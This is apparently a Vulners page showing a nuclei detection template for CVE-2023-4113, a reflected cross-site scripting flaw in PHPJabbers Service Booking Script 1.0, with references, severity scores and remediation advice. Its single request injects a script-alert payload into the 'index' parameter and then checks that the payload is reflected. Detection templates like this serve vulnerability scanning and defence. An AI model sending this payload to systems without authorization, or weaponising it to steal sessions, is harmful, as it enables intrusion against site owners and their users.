Lucene search
K

PHPJabbers Service Booking Script 1.0 - Cross Site Scripting

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

PHPJabbers Service Booking Script 1.0 - Cross Site Scripting vulnerability foun

Related
Refs
Code
id: CVE-2023-4113

info:
  name: PHPJabbers Service Booking Script 1.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the index parameter to steal session tokens and credentials of service booking system administrators and customers.
  remediation: |
    Update PHPJabbers Service Booking Script to a version newer than 1.0 that properly sanitizes the index parameter in pjFrontPublic controller.
  reference:
    - http://packetstormsecurity.com/files/173931/PHPJabbers-Service-Booking-Script-1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4113
    - https://vuldb.com/?ctiid.235960
    - https://vuldb.com/?id.235960
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4113
    cwe-id: CWE-79
    epss-score: 0.05177
    epss-percentile: 0.91405
    cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpjabbers
    product: service_booking_script
  tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "Select Service(s)", "><script>alert(document.domain)</script>")'
        condition: and
# digest: 490a00463044022012264266102c88857254e65b33adcea39690324370ac32f9e42c16f6b38dcdec02204e8d7eed178f3d52e99779b5da25a899dcae0a0df7458e4cf454b261697ca1a9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
3.9Low risk
Vulners AI Score3.9
CVSS 3.14.3 - 6.1
CVSS 25
CVSS 34.3
EPSS0.05177
24